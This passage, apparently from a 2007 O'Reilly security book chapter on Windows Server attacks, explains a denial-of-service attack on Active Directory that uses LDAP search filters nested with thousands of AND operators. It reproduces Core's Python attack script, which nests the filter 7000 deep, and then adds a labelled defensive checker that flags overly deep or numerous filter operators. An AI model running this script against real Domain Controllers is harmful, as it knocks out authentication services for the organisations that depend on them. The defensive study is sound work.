Download Reference - Network Security Administrator/Specialist

“search request” to an Active Directory server. The “search request” must search for a
nonexistent machine within the Domain Controller to which you’ve previously bound.
It must be composed of more than 1000 AND statements, although OR, GE, LE and
other binary operators are presumed to yield the same results.
Here’s the Python script Core provides in order to create such a request:
# The Ldap base class and the asn1 module used below are not shown on this page.
class ActiveDirectoryDOS( Ldap ):

    def __init__(self):
        self._s = None
        self.host = '192.168.0.1'
        self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
        self.port = 389
        self.buffer = ''
        self.msg_id = 1
        Ldap.__init__( )

    def generateFilter_BinaryOp( self, filter ):
        # filter is an (operator, attribute, value) tuple
        filterBuffer = asn1.OCTETSTRING(filter[1]).encode( ) + \
                       asn1.OCTETSTRING(filter[2]).encode( )
        filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
        return filterBuffer

    def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
        # wrap the simple comparison in numTimes nested AND operators
        simpleBinOp = self.generateFilter_BinaryOp( filter )
        filterBuffer = simpleBinOp
        for cnt in range( 0, numTimes ):
            filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND,
                                                   filterBuffer + simpleBinOp )
        return filterBuffer

    def searchSub( self, filterBuffer ):
        self.bindRequest( )
        self.searchRequest( filterBuffer )

    def run(self, host = '', basedn = '', name = '' ):
        # the machine must not exist
        machine_name = 'xaxax'
        filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)
        # execute the anonymous query
        print 'executing query'
        filterBuffer = self.generateFilter_RecursiveBinaryOp(
            filterComputerNotInDir, 7000 )
        self.searchSub( filterBuffer )
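As a defensive counterpart to the request described above, this added example (not Core's code and not from the book) measures how many AND/OR/NOT operators a BER-encoded LDAP search filter contains and how deeply they nest, the kind of check an LDAP proxy or IDS could apply before a request reaches a Domain Controller. The limit of 1000 takes the page's figure as an assumed, tunable threshold; the function names and the sample bytes are constructed for illustration.

```python
AND, OR, NOT = 0xA0, 0xA1, 0xA2  # RFC 4511 Filter CHOICE tags for and/or/not

def tlv(tag, body):
    """BER-encode one element (used only to build the constructed sample)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    size = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(size)]) + size + body

def read_tlv(buf, pos, end):
    """Return (tag, value_start, value_end) of the element at pos, bounds-checked."""
    if pos + 2 > end:
        raise ValueError("truncated element")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > end:
            raise ValueError("unsupported or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > end:
        raise ValueError("element overruns its container")
    return tag, pos, pos + length

def filter_stats(buf):
    """Walk a BER filter without recursion; return (max_depth, operator_count)."""
    max_depth = ops = 0
    stack = [(0, len(buf), 0)]  # (start, end, nesting depth of this span)
    while stack:
        pos, end, depth = stack.pop()
        while pos < end:
            tag, start, stop = read_tlv(buf, pos, end)
            if tag in (AND, OR, NOT):
                ops += 1
                max_depth = max(max_depth, depth + 1)
                stack.append((start, stop, depth + 1))
            pos = stop
    return max_depth, ops

def exceeds_limit(buf, limit=1000):
    """limit=1000 mirrors the page's figure; it is a tunable assumption."""
    depth, ops = filter_stats(buf)
    return depth > limit or ops > limit

# Constructed sample: (&(&(name=a)(name=b))(name=c)), not captured traffic.
def eq(value):
    return tlv(0xA3, tlv(0x04, b"name") + tlv(0x04, value))
SAMPLE = tlv(AND, tlv(AND, eq(b"a") + eq(b"b")) + eq(b"c"))
```

The walk uses an explicit stack, so the checker's own cost stays bounded by the request size no matter how deep the nesting goes.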
Chapter 14: Windows Server Attacks
Copyright © 2007 O’Reilly & Associates, Inc. All rights reserved.